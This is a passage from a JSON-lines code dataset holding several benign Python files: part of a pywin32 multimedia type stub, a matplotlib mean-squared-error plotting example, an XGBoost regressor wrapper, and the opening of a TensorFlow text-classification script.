Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_PCSPEAKER: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_WAVEOUT: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_AUXILIARY: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_ANALOG: Incomplete\nMIXERLINE_COMPONENTTYPE_SRC_LAST: Incomplete\nMIXERLINE_TARGETTYPE_UNDEFINED: int\nMIXERLINE_TARGETTYPE_WAVEOUT: int\nMIXERLINE_TARGETTYPE_WAVEIN: int\nMIXERLINE_TARGETTYPE_MIDIOUT: int\nMIXERLINE_TARGETTYPE_MIDIIN: int\nMIXERLINE_TARGETTYPE_AUX: int\nMIXER_GETLINEINFOF_DESTINATION: int\nMIXER_GETLINEINFOF_SOURCE: int\nMIXER_GETLINEINFOF_LINEID: int\nMIXER_GETLINEINFOF_COMPONENTTYPE: int\nMIXER_GETLINEINFOF_TARGETTYPE: int\nMIXER_GETLINEINFOF_QUERYMASK: int\nMIXERCONTROL_CONTROLF_UNIFORM: int\nMIXERCONTROL_CONTROLF_MULTIPLE: int\nMIXERCONTROL_CONTROLF_DISABLED: int\nMIXERCONTROL_CT_CLASS_MASK: int\nMIXERCONTROL_CT_CLASS_CUSTOM: int\nMIXERCONTROL_CT_CLASS_METER: int\nMIXERCONTROL_CT_CLASS_SWITCH: int\nMIXERCONTROL_CT_CLASS_NUMBER: int\nMIXERCONTROL_CT_CLASS_SLIDER: int\nMIXERCONTROL_CT_CLASS_FADER: int\nMIXERCONTROL_CT_CLASS_TIME: int\nMIXERCONTROL_CT_CLASS_LIST: int\nMIXERCONTROL_CT_SUBCLASS_MASK: int\nMIXERCONTROL_CT_SC_SWITCH_BOOLEAN: int\nMIXERCONTROL_CT_SC_SWITCH_BUTTON: int\nMIXERCONTROL_CT_SC_METER_POLLED: int\nMIXERCONTROL_CT_SC_TIME_MICROSECS: int\nMIXERCONTROL_CT_SC_TIME_MILLISECS: int\nMIXERCONTROL_CT_SC_LIST_SINGLE: int\nMIXERCONTROL_CT_SC_LIST_MULTIPLE: int\nMIXERCONTROL_CT_UNITS_MASK: int\nMIXERCONTROL_CT_UNITS_CUSTOM: int\nMIXERCONTROL_CT_UNITS_BOOLEAN: int\nMIXERCONTROL_CT_UNITS_SIGNED: int\nMIXERCONTROL_CT_UNITS_UNSIGNED: int\nMIXERCONTROL_CT_UNITS_DECIBELS: int\nMIXERCONTROL_CT_UNITS_PERCENT: int\nMIXERCONTROL_CONTROLTYPE_CUSTOM: Incomplete\nMIXERCONTROL_CONTROLTYPE_BOOLEANMETER: Incomplete\nMIXERCONTROL_CONTROLTYPE_SIGNEDMETER: Incomplete\nMIXERCONTROL_CONTROLTYPE_PEAKMETER: Incomplete\nMIXERCONTROL_CONTROLTYPE_UNSIGNEDMETER: Incomplete\nMIXERCONTROL_CONTROLTYPE_BOOLEAN: Incomplete\nMIXERCONTROL_CONTROLTYPE_ONOFF: Incomplete\nMIXERCONTROL_CONTROLTYPE_MUTE: Incomplete\nMIXERCONTROL_CONTROLTYPE_MONO: Incomplete\nMIXERCONTROL_CONTROLTYPE_LOUDNESS: Incomplete\nMIXERCONTROL_CONTROLTYPE_STEREOENH: Incomplete\nMIXERCONTROL_CONTROLTYPE_BUTTON: Incomplete\nMIXERCONTROL_CONTROLTYPE_DECIBELS: Incomplete\nMIXERCONTROL_CONTROLTYPE_SIGNED: Incomplete\nMIXERCONTROL_CONTROLTYPE_UNSIGNED: Incomplete\nMIXERCONTROL_CONTROLTYPE_PERCENT: Incomplete\nMIXERCONTROL_CONTROLTYPE_SLIDER: Incomplete\nMIXERCONTROL_CONTROLTYPE_PAN: Incomplete\nMIXERCONTROL_CONTROLTYPE_QSOUNDPAN: Incomplete\nMIXERCONTROL_CONTROLTYPE_FADER: Incomplete\nMIXERCONTROL_CONTROLTYPE_VOLUME: Incomplete\nMIXERCONTROL_CONTROLTYPE_BASS: Incomplete\nMIXERCONTROL_CONTROLTYPE_TREBLE: Incomplete\nMIXERCONTROL_CONTROLTYPE_EQUALIZER: Incomplete\nMIXERCONTROL_CONTROLTYPE_SINGLESELECT: Incomplete\nMIXERCONTROL_CONTROLTYPE_MUX: Incomplete\nMIXERCONTROL_CONTROLTYPE_MULTIPLESELECT: Incomplete\nMIXERCONTROL_CONTROLTYPE_MIXER: Incomplete\nMIXERCONTROL_CONTROLTYPE_MICROTIME: Incomplete\nMIXERCONTROL_CONTROLTYPE_MILLITIME: Incomplete\nMIXER_GETLINECONTROLSF_ALL: int\nMIXER_GETLINECONTROLSF_ONEBYID: int\nMIXER_GETLINECONTROLSF_ONEBYTYPE: int\nMIXER_GETLINECONTROLSF_QUERYMASK: int\nMIXER_GETCONTROLDETAILSF_VALUE: int\nMIXER_GETCONTROLDETAILSF_LISTTEXT: int\nMIXER_GETCONTROLDETAILSF_QUERYMASK: int\nMIXER_SETCONTROLDETAILSF_VALUE: int\nMIXER_SETCONTROLDETAILSF_CUSTOM: int\nMIXER_SETCONTROLDETAILSF_QUERYMASK: int\nTIMERR_NOERROR: int\nTIMERR_NOCANDO: Incomplete\nTIMERR_STRUCT: Incomplete\nTIME_ONESHOT: int\nTIME_PERIODIC: int\nTIME_CALLBACK_FUNCTION: int\nTIME_CALLBACK_EVENT_SET: int\nTIME_CALLBACK_EVENT_PULSE: int\nJOYERR_NOERROR: int\nJOYERR_PARMS: Incomplete\nJOYERR_NOCANDO: Incomplete\nJOYERR_UNPLUGGED: Incomplete\nJOY_BUTTON1: int\nJOY_BUTTON2: int\nJOY_BUTTON3: int\nJOY_BUTTON4: int\nJOY_BUTTON1CHG: int\nJOY_BUTTON2CHG: int\nJOY_BUTTON3CHG: int\nJOY_BUTTON4CHG: int\nJOY_BUTTON5: int\nJOY_BUTTON6: int\nJOY_BUTTON7: int\nJOY_BUTTON8: int\nJOY_BUTTON9: int\nJOY_BUTTON10: int\nJOY_BUTTON11: int\nJOY_BUTTON12: int\nJOY_BUTTON13: int\nJOY_BUTTON14: int\nJOY_BUTTON15: int\nJOY_BUTTON16: int\nJOY_BUTTON17: int\nJOY_BUTTON18: int\nJOY_BUTTON19: int\nJOY_BUTTON20: int\nJOY_BUTTON21: int\nJOY_BUTTON22: int\nJOY_BUTTON23: int\nJOY_BUTTON24: int\nJOY_BUTTON25: int\nJOY_BUTTON26: int\nJOY_BUTTON27: int\nJOY_BUTTON28: int\nJOY_BUTTON29: int\nJOY_BUTTON30: int\nJOY_BUTTON31: int\nJOY_BUTTON32: int\nJOY_POVFORWARD: int\nJOY_POVRIGHT: int\nJOY_POVBACKWARD: int\nJOY_POVLEFT: int\nJOY_RETURNX: int\nJOY_RETURNY: int\nJOY_RETURNZ: int\nJOY_RETURNR: int\nJOY_RETURNU: int\nJOY_RETURNV: int\nJOY_RETURNPOV: int\nJOY_RETURNBUTTONS: int\nJOY_RETURNRAWDATA: int\nJOY_RETURNPOVCTS: int\nJOY_RETURNCENTERED: int\nJOY_USEDEADZONE: int\nJOY_RETURNALL: Incomplete\nJOY_CAL_READALWAYS: int\nJOY_CAL_READXYONLY: int\nJOY_CAL_READ3: int\nJOY_CAL_READ4: int\nJOY_CAL_READXONLY: int\nJOY_CAL_READYONLY: int\nJOY_CAL_READ5: int\nJOY_CAL_READ6: int\nJOY_CAL_READZONLY: int\nJOY_CAL_READRONLY: int\nJOY_CAL_READUONLY: int\nJOY_CAL_READVONLY: int\nJOYSTICKID1: int\nJOYSTICKID2: int\nJOYCAPS_HASZ: int\nJOYCAPS_HASR: int\nJOYCAPS_HASU: int\nJOYCAPS_HASV: int\nJOYCAPS_HASPOV: int\nJOYCAPS_POV4DIR: int\nJOYCAPS_POVCTS: int\nMMIOERR_BASE: int\nMMIOERR_FILENOTFOUND: Incomplete\nMMIOERR_OUTOFMEMORY: Incomplete\nMMIOERR_CANNOTOPEN: Incomplete\nMMIOERR_CANNOTCLOSE: Incomplete\nMMIOERR_CANNOTREAD: Incomplete\nMMIOERR_CANNOTWRITE: Incomplete\nMMIOERR_CANNOTSEEK: Incomplete\nMMIOERR_CANNOTEXPAND: Incomplete\nMMIOERR_CHUNKNOTFOUND: Incomplete\nMMIOERR_UNBUFFERED: Incomplete\nMMIOERR_PATHNOTFOUND: Incomplete\nMMIOERR_ACCESSDENIED: Incomplete\nMMIOERR_SHARINGVIOLATION: Incomplete\nMMIOERR_NETWORKERROR: Incomplete\nMMIOERR_TOOMANYOPENFILES: Incomplete\nMMIOERR_INVALIDFILE: Incomplete\nCFSEPCHAR: Incomplete\nMMIO_RWMODE: int\nMMIO_SHAREMODE: int\nMMIO_CREATE: int\nMMIO_PARSE: int\nMMIO_DELETE: int\nMMIO_EXIST: int\nMMIO_ALLOCBUF: int\nMMIO_GETTEMP: int\nMMIO_DIRTY: int\nMMIO_READ: int\nMMIO_WRITE: int\nMMIO_READWRITE: int\nMMIO_COMPAT: int\nMMIO_EXCLUSIVE: int\nMMIO_DENYWRITE: int\nMMIO_DENYREAD: int\nMMIO_DENYNONE: int\nMMIO_FHOPEN: int\nMMIO_EMPTYBUF: int\nMMIO_TOUPPER: int\nMMIO_INSTALLPROC: int\nMMIO_GLOBALPROC: int\nMMIO_REMOVEPROC: int\nMMIO_UNICODEPROC: int\nMMIO_FINDPROC: int\nMMIO_FINDCHUNK: int\nMMIO_FINDRIFF: int\nMMIO_FINDLIST: int\nMMIO_CREATERIFF: int\nMMIO_CREATELIST: int\nMMIOM_READ: int\nMMIOM_WRITE: int\nMMIOM_SEEK: int\nMMIOM_OPEN: int\nMMIOM_CLOSE: int\nMMIOM_WRITEFLUSH: int\nMMIOM_RENAME: int\nMMIOM_USER: int\nSEEK_SET: int\nSEEK_CUR: int\nSEEK_END: int\nMMIO_DEFAULTBUFFER: int\nMCIERR_INVALID_DEVICE_ID: Incomplete\nMCIERR_UNRECOGNIZED_KEYWORD: Incomplete\nMCIERR_UNRECOGNIZED_COMMAND: Incomplete\nMCIERR_HARDWARE: Incomplete\nMCIERR_INVALID_DEVICE_NAME: Incomplete\nMCIERR_OUT_OF_MEMORY: Incomplete\nMCIERR_DEVICE_OPEN: Incomplete\nMCIERR_CANNOT_LOAD_DRIVER: Incomplete\nMCIERR_MISSING_COMMAND_STRING: Incomplete\nMCIERR_PARAM_OVERFLOW: Incomplete\nMCIERR_MISSING_STRING_ARGUMENT: Incomplete\nMCIERR_BAD_INTEGER: Incomplete\nMCIERR_PARSER_INTERNAL: Incomplete\nMCIERR_DRIVER_INTERNAL: Incomplete\nMCIERR_MISSING_PARAMETER: Incomplete\nMCIERR_UNSUPPORTED_FUNCTION: Incomplete\nMCIERR_FILE_NOT_FOUND: Incomplete\nMCIERR_DEVICE_NOT_READY: Incomplete\nMCIERR_INTERNAL: Incomplete\nMCIERR_DRIVER: Incomplete\nMCIERR_CANNOT_USE_ALL: Incomplete\nMCIERR_MULTIPLE: Incomplete\nMCIERR_EXTENSION_NOT_FOUND: Incomplete\nMCIERR_OUTOFRANGE: Incomplete\nMCIERR_FLAGS_NOT_COMPATIBLE: Incomplete\nMCIERR_FILE_NOT_SAVED: Incomplete\nMCIERR_DEVICE_TYPE_REQUIRED: Incomplete\nMCIERR_DEVICE_LOCKED: Incomplete\nMCIERR_DUPLICATE_ALIAS: Incomplete\nMCIERR_BAD_CONSTANT: Incomplete\nMCIERR_MUST_USE_SHAREABLE: Incomplete\nMCIERR_MISSING_DEVICE_NAME: Incomplete\nMCIERR_BAD_TIME_FORMAT: Incomplete\nMCIERR_NO_CLOSING_QUOTE: Incomplete\nMCIERR_DUPLICATE_FLAGS: Incomplete\nMCIERR_INVALID_FILE: Incomplete\nMCIERR_NULL_PARAMETER_BLOCK: Incomplete\nMCIERR_UNNAMED_RESOURCE: Incomplete\nMCIERR_NEW_REQUIRES_ALIAS: Incomplete\nMCIERR_NOTIFY_ON_AUTO_OPEN: Incomplete\nMCIERR_NO_ELEMENT_ALLOWED: Incomplete\nMCIERR_NONAPPLICABLE_FUNCTION: Incomplete\nMCIERR_ILLEGAL_FOR_AUTO_OPEN: Incomplete\nMCIERR_FILENAME_REQUIRED: Incomplete\nMCIERR_EXTRA_CHARACTERS: Incomplete\nMCIERR_DEVICE_NOT_INSTALLED: Incomplete\nMCIERR_GET_CD: Incomplete\nMCIERR_SET_CD: Incomplete\nMCIERR_SET_DRIVE: Incomplete\nMCIERR_DEVICE_LENGTH: Incomplete\nMCIERR_DEVICE_ORD_LENGTH: Incomplete\nMCIERR_NO_INTEGER: Incomplete\nMCIERR_WAVE_OUTPUTSINUSE: Incomplete\nMCIERR_WAVE_SETOUTPUTINUSE: Incomplete\nMCIERR_WAVE_INPUTSINUSE: Incomplete\nMCIERR_WAVE_SETINPUTINUSE: Incomplete\nMCIERR_WAVE_OUTPUTUNSPECIFIED: Incomplete\nMCIERR_WAVE_INPUTUNSPECIFIED: Incomplete\nMCIERR_WAVE_OUTPUTSUNSUITABLE: Incomplete\nMCIERR_WAVE_SETOUTPUTUNSUITABLE: Incomplete\nMCIERR_WAVE_INPUTSUNSUITABLE: Incomplete\nMCIERR_WAVE_SETINPUTUNSUITABLE: Incomplete\nMCIERR_SEQ_DIV_INCOMPATIBLE: Incomplete\nMCIERR_SEQ_PORT_INUSE: Incomplete\nMCIERR_SEQ_PORT_NONEXISTENT: Incomplete\nMCIERR_SEQ_PORT_MAPNODEVICE: Incomplete\nMCIERR_SEQ_PORT_MISCERROR: Incomplete\nMCIERR_SEQ_TIMER: Incomplete\nMCIERR_SEQ_PORTUNSPECIFIED: Incomplete\nMCIERR_SEQ_NOMIDIPRESENT: Incomplete\nMCIERR_NO_WINDOW: Incomplete\nMCIERR_CREATEWINDOW: Incomplete\nMCIERR_FILE_READ: Incomplete\nMCIERR_FILE_WRITE: Incomplete\nMCIERR_NO_IDENTITY: Incomplete\nMCIERR_CUSTOM_DRIVER_BASE: Incomplete\nMCI_FIRST: int\nMCI_OPEN: int\nMCI_CLOSE: int\nMCI_ESCAPE: int\nMCI_PLAY: int\nMCI_SEEK: int\nMCI_STOP: int\nMCI_PAUSE: int\nMCI_INFO: int\nMCI_GETDEVCAPS: int\nMCI_SPIN: int\nMCI_SET: int\nMCI_STEP: int\nMCI_RECORD: int\nMCI_SYSINFO: int\nMCI_BREAK: int\nMCI_SAVE: int\nMCI_STATUS: int\nMCI_CUE: int\nMCI_REALIZE: int\nMCI_WINDOW: int\nMCI_PUT: int\nMCI_WHERE: int\nMCI_FREEZE: int\nMCI_UNFREEZE: int\nMCI_LOAD: int\nMCI_CUT: int\nMCI_COPY: int\nMCI_PASTE: int\nMCI_UPDATE: int\nMCI_RESUME: int\nMCI_DELETE: int\nMCI_USER_MESSAGES: Incomplete\nMCI_LAST: int\nMCI_DEVTYPE_VCR: int\nMCI_DEVTYPE_VIDEODISC: int\nMCI_DEVTYPE_OVERLAY: int\nMCI_DEVTYPE_CD_AUDIO: int\nMCI_DEVTYPE_DAT: int\nMCI_DEVTYPE_SCANNER: int\nMCI_DEVTYPE_ANIMATION: int\nMCI_DEVTYPE_DIGITAL_VIDEO: int\nMCI_DEVTYPE_OTHER: int\nMCI_DEVTYPE_WAVEFORM_AUDIO: int\nMCI_DEVTYPE_SEQUENCER: int\nMCI_DEVTYPE_FIRST: int\nMCI_DEVTYPE_LAST: int\nMCI_DEVTYPE_FIRST_USER: int\nMCI_MODE_NOT_READY: Incomplete\nMCI_MODE_STOP: Incomplete\nMCI_MODE_PLAY: Incomplete\nMCI_MODE_RECORD: Incomplete\nMCI_MODE_SEEK: Incomplete\nMCI_MODE_PAUSE: Incomplete\nMCI_MODE_OPEN: Incomplete\nMCI_FORMAT_MILLISECONDS: int\nMCI_FORMAT_HMS: int\nMCI_FORMAT_MSF: int\nMCI_FORMAT_FRAMES: int\nMCI_FORMAT_SMPTE_24: int\nMCI_FORMAT_SMPTE_25: int\nMCI_FORMAT_SMPTE_30: int\nMCI_FORMAT_SMPTE_30DROP: int\nMCI_FORMAT_BYTES: int\nMCI_FORMAT_SAMPLES: int\nMCI_FORMAT_TMSF: int\n\ndef MCI_MSF_MINUTE(msf): ...\ndef MCI_MSF_SECOND(msf): ...\ndef MCI_MSF_FRAME(msf): ...\ndef MCI_TMSF_TRACK(tmsf): ...\ndef MCI_TMSF_MINUTE(tmsf): ...\ndef MCI_TMSF_SECOND(tmsf): ...\ndef MCI_TMSF_FRAME(tmsf): ...\ndef MCI_HMS_HOUR(hms): ...\ndef MCI_HMS_MINUTE(hms): ...\ndef MCI_HMS_SECOND(hms): ...\n\nMCI_NOTIFY_SUCCESSFUL: int\nMCI_NOTIFY_SUPERSEDED: int\nMCI_NOTIFY_ABORTED: int\nMCI_NOTIFY_FAILURE: int\nMCI_NOTIFY: int\nMCI_WAIT: int\nMCI_FROM: int\nMCI_TO: int\nMCI_TRACK: int\nMCI_OPEN_SHAREABLE: int\nMCI_OPEN_ELEMENT: int\nMCI_OPEN_ALIAS: int\nMCI_OPEN_ELEMENT_ID: int\nMCI_OPEN_TYPE_ID: int\nMCI_OPEN_TYPE: int\nMCI_SEEK_TO_START: int\nMCI_SEEK_TO_END: int\nMCI_STATUS_ITEM: int\nMCI_STATUS_START: int\nMCI_STATUS_LENGTH: int\nMCI_STATUS_POSITION: int\nMCI_STATUS_NUMBER_OF_TRACKS: int\nMCI_STATUS_MODE: int\nMCI_STATUS_MEDIA_PRESENT: int\nMCI_STATUS_TIME_FORMAT: int\nMCI_STATUS_READY: int\nMCI_STATUS_CURRENT_TRACK: int\nMCI_INFO_PRODUCT: int\nMCI_INFO_FILE: int\nMCI_INFO_MEDIA_UPC: int\nMCI_INFO_MEDIA_IDENTITY: int\nMCI_INFO_NAME: int\nMCI_INFO_COPYRIGHT: int\nMCI_GETDEVCAPS_ITEM: int\nMCI_GETDEVCAPS_CAN_RECORD: int\nMCI_GETDEVCAPS_HAS_AUDIO: int\nMCI_GETDEVCAPS_HAS_VIDEO: int\nMCI_GETDEVCAPS_DEVICE_TYPE: int\nMCI_GETDEVCAPS_USES_FILES: int\nMCI_GETDEVCAPS_COMPOUND_DEVICE: int\nMCI_GETDEVCAPS_CAN_EJECT: int\nMCI_GETDEVCAPS_CAN_PLAY: int\nMCI_GETDEVCAPS_CAN_SAVE: int\nMCI_SYSINFO_QUANTITY: int\nMCI_SYSINFO_OPEN: int\nMCI_SYSINFO_NAME: int\nMCI_SYSINFO_INSTALLNAME: int\nMCI_SET_DOOR_OPEN: int\nMCI_SET_DOOR_CLOSED: int\nMCI_SET_TIME_FORMAT: int\nMCI_SET_AUDIO: int\nMCI_SET_VIDEO: int\nMCI_SET_ON: int\nMCI_SET_OFF: int\nMCI_SET_AUDIO_ALL: int\nMCI_SET_AUDIO_LEFT: int\nMCI_SET_AUDIO_RIGHT: int\nMCI_BREAK_KEY: int\nMCI_BREAK_HWND: int\nMCI_BREAK_OFF: int\nMCI_RECORD_INSERT: int\nMCI_RECORD_OVERWRITE: int\nMCI_SAVE_FILE: int\nMCI_LOAD_FILE: int\nMCI_VD_MODE_PARK: Incomplete\nMCI_VD_MEDIA_CLV: Incomplete\nMCI_VD_MEDIA_CAV: Incomplete\nMCI_VD_MEDIA_OTHER: Incomplete\nMCI_VD_FORMAT_TRACK: int\nMCI_VD_PLAY_REVERSE: int\nMCI_VD_PLAY_FAST: int\nMCI_VD_PLAY_SPEED: int\nMCI_VD_PLAY_SCAN: int\nMCI_VD_PLAY_SLOW: int\nMCI_VD_SEEK_REVERSE: int\nMCI_VD_STATUS_SPEED: int\nMCI_VD_STATUS_FORWARD: int\nMCI_VD_STATUS_MEDIA_TYPE: int\nMCI_VD_STATUS_SIDE: int\nMCI_VD_STATUS_DISC_SIZE: int\nMCI_VD_GETDEVCAPS_CLV: int\nMCI_VD_GETDEVCAPS_CAV: int\nMCI_VD_SPIN_UP: int\nMCI_VD_SPIN_DOWN: int\nMCI_VD_GETDEVCAPS_CAN_REVERSE: int\nMCI_VD_GETDEVCAPS_FAST_RATE: int\nMCI_VD_GETDEVCAPS_SLOW_RATE: int\nMCI_VD_GETDEVCAPS_NORMAL_RATE: int\nMCI_VD_STEP_FRAMES: int\nMCI_VD_STEP_REVERSE: int\nMCI_VD_ESCAPE_STRING: int\nMCI_CDA_STATUS_TYPE_TRACK: int\nMCI_CDA_TRACK_AUDIO: Incomplete\nMCI_CDA_TRACK_OTHER: Incomplete\nMCI_WAVE_PCM: Incomplete\nMCI_WAVE_MAPPER: Incomplete\nMCI_WAVE_OPEN_BUFFER: int\nMCI_WAVE_SET_FORMATTAG: int\nMCI_WAVE_SET_CHANNELS: int\nMCI_WAVE_SET_SAMPLESPERSEC: int\nMCI_WAVE_SET_AVGBYTESPERSEC: int\nMCI_WAVE_SET_BLOCKALIGN: int\nMCI_WAVE_SET_BITSPERSAMPLE: int\nMCI_WAVE_INPUT: int\nMCI_WAVE_OUTPUT: int\nMCI_WAVE_STATUS_FORMATTAG: int\nMCI_WAVE_STATUS_CHANNELS: int\nMCI_WAVE_STATUS_SAMPLESPERSEC: int\nMCI_WAVE_STATUS_AVGBYTESPERSEC: int\nMCI_WAVE_STATUS_BLOCKALIGN: int\nMCI_WAVE_STATUS_BITSPERSAMPLE: int\nMCI_WAVE_STATUS_LEVEL: int\nMCI_WAVE_SET_ANYINPUT: int\nMCI_WAVE_SET_ANYOUTPUT: int\nMCI_WAVE_GETDEVCAPS_INPUTS: int\nMCI_WAVE_GETDEVCAPS_OUTPUTS: int\nMCI_SEQ_DIV_PPQN: Incomplete\nMCI_SEQ_DIV_SMPTE_24: Incomplete\nMCI_SEQ_DIV_SMPTE_25: Incomplete\nMCI_SEQ_DIV_SMPTE_30DROP: Incomplete\nMCI_SEQ_DIV_SMPTE_30: Incomplete\nMCI_SEQ_FORMAT_SONGPTR: int\nMCI_SEQ_FILE: int\nMCI_SEQ_MIDI: int\nMCI_SEQ_SMPTE: int\nMCI_SEQ_NONE: int\nMCI_SEQ_MAPPER: int\nMCI_SEQ_STATUS_TEMPO: int\nMCI_SEQ_STATUS_PORT: int\nMCI_SEQ_STATUS_SLAVE: int\nMCI_SEQ_STATUS_MASTER: int\nMCI_SEQ_STATUS_OFFSET: int\nMCI_SEQ_STATUS_DIVTYPE: int\nMCI_SEQ_STATUS_NAME: int\nMCI_SEQ_STATUS_COPYRIGHT: int\nMCI_SEQ_SET_TEMPO: int\nMCI_SEQ_SET_PORT: int\nMCI_SEQ_SET_SLAVE: int\nMCI_SEQ_SET_MASTER: int\nMCI_SEQ_SET_OFFSET: int\nMCI_ANIM_OPEN_WS: int\nMCI_ANIM_OPEN_PARENT: int\nMCI_ANIM_OPEN_NOSTATIC: int\nMCI_ANIM_PLAY_SPEED: int\nMCI_ANIM_PLAY_REVERSE: int\nMCI_ANIM_PLAY_FAST: int\nMCI_ANIM_PLAY_SLOW: int\nMCI_ANIM_PLAY_SCAN: int\nMCI_ANIM_STEP_REVERSE: int\nMCI_ANIM_STEP_FRAMES: int\nMCI_ANIM_STATUS_SPEED: int\nMCI_ANIM_STATUS_FORWARD: int\nMCI_ANIM_STATUS_HWND: int\nMCI_ANIM_STATUS_HPAL: int\nMCI_ANIM_STATUS_STRETCH: int\nMCI_ANIM_INFO_TEXT: int\nMCI_ANIM_GETDEVCAPS_CAN_REVERSE: int\nMCI_ANIM_GETDEVCAPS_FAST_RATE: int\nMCI_ANIM_GETDEVCAPS_SLOW_RATE: int\nMCI_ANIM_GETDEVCAPS_NORMAL_RATE: int\nMCI_ANIM_GETDEVCAPS_PALETTES: int\nMCI_ANIM_GETDEVCAPS_CAN_STRETCH: int\nMCI_ANIM_GETDEVCAPS_MAX_WINDOWS: int\nMCI_ANIM_REALIZE_NORM: int\nMCI_ANIM_REALIZE_BKGD: int\nMCI_ANIM_WINDOW_HWND: int\nMCI_ANIM_WINDOW_STATE: int\nMCI_ANIM_WINDOW_TEXT: int\nMCI_ANIM_WINDOW_ENABLE_STRETCH: int\nMCI_ANIM_WINDOW_DISABLE_STRETCH: int\nMCI_ANIM_WINDOW_DEFAULT: int\nMCI_ANIM_RECT: int\nMCI_ANIM_PUT_SOURCE: int\nMCI_ANIM_PUT_DESTINATION: int\nMCI_ANIM_WHERE_SOURCE: int\nMCI_ANIM_WHERE_DESTINATION: int\nMCI_ANIM_UPDATE_HDC: int\nMCI_OVLY_OPEN_WS: int\nMCI_OVLY_OPEN_PARENT: int\nMCI_OVLY_STATUS_HWND: int\nMCI_OVLY_STATUS_STRETCH: int\nMCI_OVLY_INFO_TEXT: int\nMCI_OVLY_GETDEVCAPS_CAN_STRETCH: int\nMCI_OVLY_GETDEVCAPS_CAN_FREEZE: int\nMCI_OVLY_GETDEVCAPS_MAX_WINDOWS: int\nMCI_OVLY_WINDOW_HWND: int\nMCI_OVLY_WINDOW_STATE: int\nMCI_OVLY_WINDOW_TEXT: int\nMCI_OVLY_WINDOW_ENABLE_STRETCH: int\nMCI_OVLY_WINDOW_DISABLE_STRETCH: int\nMCI_OVLY_WINDOW_DEFAULT: int\nMCI_OVLY_RECT: int\nMCI_OVLY_PUT_SOURCE: int\nMCI_OVLY_PUT_DESTINATION: int\nMCI_OVLY_PUT_FRAME: int\nMCI_OVLY_PUT_VIDEO: int\nMCI_OVLY_WHERE_SOURCE: int\nMCI_OVLY_WHERE_DESTINATION: int\nMCI_OVLY_WHERE_FRAME: int\nMCI_OVLY_WHERE_VIDEO: int\nSELECTDIB: int\n\ndef DIBINDEX(n): ...\n","repo_name":"JetBrains/intellij-community","sub_path":"python/helpers/typeshed/stubs/pywin32/win32/lib/mmsystem.pyi","file_name":"mmsystem.pyi","file_ext":"pyi","file_size_in_byte":22380,"program_lang":"python","lang":"en","doc_type":"code","stars":16005,"dataset":"github-code","pt":"66"} +{"seq_id":"4615436431","text":"import matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\n\nX_values = np.arange(1, 8)\n\ndata = [1, 2.5, 2.9, 6, 3.8, 4.1, 8.2]\n\nmodel1 = np.arange(1, 8)\nmodel2 = np.arange(0, 7, 1.1)\nmodel3 = np.arange(1.5, 9, 1.15)\n\nplt.plot(X_values, model1, c='green', label=f'MSE = {mean_squared_error(data, model1):.2f}') # the model\nplt.plot(X_values, model2, c='blue', label=f'MSE = {mean_squared_error(data, model2):.2f}') # the model\nplt.plot(X_values, model3, c='orange', label=f'MSE = {mean_squared_error(data, model3):.2f}') # the model\nplt.scatter(X_values, data, c='red') # the actual data\nplt.title(f'Mean Square Error (MSE) Example')\nplt.xlabel('X-Axis')\nplt.ylabel('Y-Axis')\nplt.legend()\n\n#plt.show()\nplt.savefig('Ball-Rague-Fig6.8.eps', bbox_inches='tight')\n\n","repo_name":"robertball/Beginners-Guide-Data-Science","sub_path":"Chapter_6_Metrics/mse.py","file_name":"mse.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"33066869721","text":"from xgboost import XGBRegressor\nfrom sklearn.base import BaseEstimator\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\nclass XGBoostAdapted(BaseEstimator):\n\n def __init__(self, early_stopping_rounds=10, eval_metric=None, eval_set_percent=0.2, random_seed=None, n_jobs=1, max_depth=6, n_estimators=50, nthread=1, reg_alpha=0):\n self.early_stopping_rounds = early_stopping_rounds\n self.eval_metric = eval_metric\n self.eval_set_percent = eval_set_percent\n self.random_seed = random_seed\n self.n_jobs = n_jobs\n self.max_depth = max_depth\n self.n_estimators = n_estimators\n self.nthread = nthread\n self.reg_alpha = reg_alpha\n\n \n def fit(self, X, y):\n self._xgbregressor = XGBRegressor(n_jobs=self.n_jobs, max_depth=self.max_depth, n_estimators=self.n_estimators, nthread=self.nthread, reg_alpha=self.reg_alpha)\n\n X_train, X_test, y_train, y_test = train_test_split(X.values, y.values, test_size=self.eval_set_percent, random_state=self.random_seed)\n\n eval_set = [(X_test, y_test)]\n\n self._xgbregressor.fit(X_train, y_train, early_stopping_rounds=self.early_stopping_rounds, eval_metric=self.eval_metric, eval_set=eval_set)\n \n return self\n\n def score(self, X, y, sample_weight=None):\n return self._xgbregressor.score(X.values, y.values, sample_weight)\n\n def predict(self, X):\n return self._xgbregressor.predict(X.values)\n\n\n\n\n \n \n\n\n\n\n\n","repo_name":"juaml/brainage_estimation","sub_path":"brainage/xgboost_adapted.py","file_name":"xgboost_adapted.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"66"} +{"seq_id":"10982747203","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras import layers\nfrom keras.layers import TextVectorization\nfrom sklearn.model_selection import train_test_split\n\ndf = pd.read_excel(\"generated_data.xlsx\")\ndf = df.drop(columns=['LENGTH', 'TYPE'])\n\nfeatures, targets = df['TITLE'], df['LABEL']\n\ntrain_features, test_features, train_targets, test_targets = train_test_split(\n features, targets,\n train_size=0.8,\n test_size=0.1,\n random_state=42,\n shuffle=True,\n stratify=targets\n)\n\ntrain_features, val_features, train_targets, val_targets = train_test_split(\n train_features, train_targets,\n train_size=0.8,\n test_size=0.1,\n random_state=42,\n shuffle=True,\n stratify=train_targets\n)\n\n# train X & Y\ntrain_text_ds_raw = tf.data.Dataset.from_tensor_slices(\n tf.cast(train_features.values, tf.string)\n)\ntrain_cat_ds_raw = tf.data.Dataset.from_tensor_slices(\n tf.cast(train_targets.values, tf.int64),\n\n)\n# test X & y\ntest_text_ds_raw = tf.data.Dataset.from_tensor_slices(\n tf.cast(test_features.values, tf.string)\n)\ntest_cat_ds_raw = 